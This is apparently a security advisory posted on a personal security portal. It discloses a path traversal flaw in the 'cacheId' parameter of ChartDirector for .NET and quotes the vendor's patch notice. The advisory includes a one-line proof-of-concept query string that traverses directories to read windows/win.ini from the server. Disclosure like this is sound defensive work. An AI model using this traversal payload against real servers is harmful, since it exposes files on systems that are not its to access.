E-Books Online     E-Books Download     DokFLeed.Net Tools     Smoking Kills Search The Site
   
Labrova PHP Sheild Protection              
Portal Services
· Home
· Downloads
· Encyclopedia
· Feedback
· IP Diagnosis
· MP3
· PHP JAVA & Poems
· Private Messages
· Recommend Us
· Security Links
· Statistics
· Stories Archive
· Submit News
· Surveys
· Top 10
· Topics
· Your Account

Users Info
Welcome, AnonyDok
Nickname
Password
(Register)
Membership:
Latest: Impomymat
New Today: 1
New Yesterday: 0
Overall: 1946
People Online:
Visitors: 10
Members: 0
Total: 10

Topic Articles: ChartDirector Critical File Access
Posted on Sunday, September 06 @ 05:17:44 EDT by DokFLeed

Latest Threats 

Advisory No.: ISNSC-0910  
=============
ChartDirector Critical File Access 

Information
======
Author: DokFLeed 
Program Affected: http://www.chartdir.com for .NET 
Severity: Critical.
Type of Advisory: Mid Disclosure.
Affected/Tested Versions: Random

Program Description 
==================
Widely used Chart Component on Financial & Stock Trading websites

Overview 
=========
The query variable "cacheId=" is not sanitized, it will can allow critical files download


Proof Of Concept
================
?ChartDirectorChartImage=chart_WebChartViewer1&cacheId=/../../../../../../../../windows/win.ini


Solution/Fix
============
Upgrade to latest Chart Dir or apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2): 
http://www.advsofteng.com/netchartdir501p2.zip

Vendor Status
============
Vendor contacted & replied with "The problem you mentions affect ChartDirector for .NET.
The current version of ChartDirector for .NET on our web site (Ver 5.0.2) already has this issue fixed. 
So this issue no longer occurs with the current version of ChartDirector for .NET.
For people using earlier versions of ChartDirector, it is suggested they upgrade to the latest version. 
They may also apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2): 
http://www.advsofteng.com/netchartdir501p2.zip   "

Reference
============
http://dokfleed.net/duh/modules.php?name=News&file=article&sid=48

 
Related Links
· More about Latest Threats
· News by DokFLeed
Most read story about Latest Threats:
IP Hijack


Article Rating
Average Score: 0
Votes: 0

Please take a second and vote for this article:

Excellent
Very Good
Good
Regular
Bad


Options

 Printer Friendly Printer Friendly

 Send to a Friend Send to a Friend


Associated Topics

Latest Xploits

Sorry, Comments are not available for this article.

 

You can syndicate our news using the file backend.php or ultramode.txt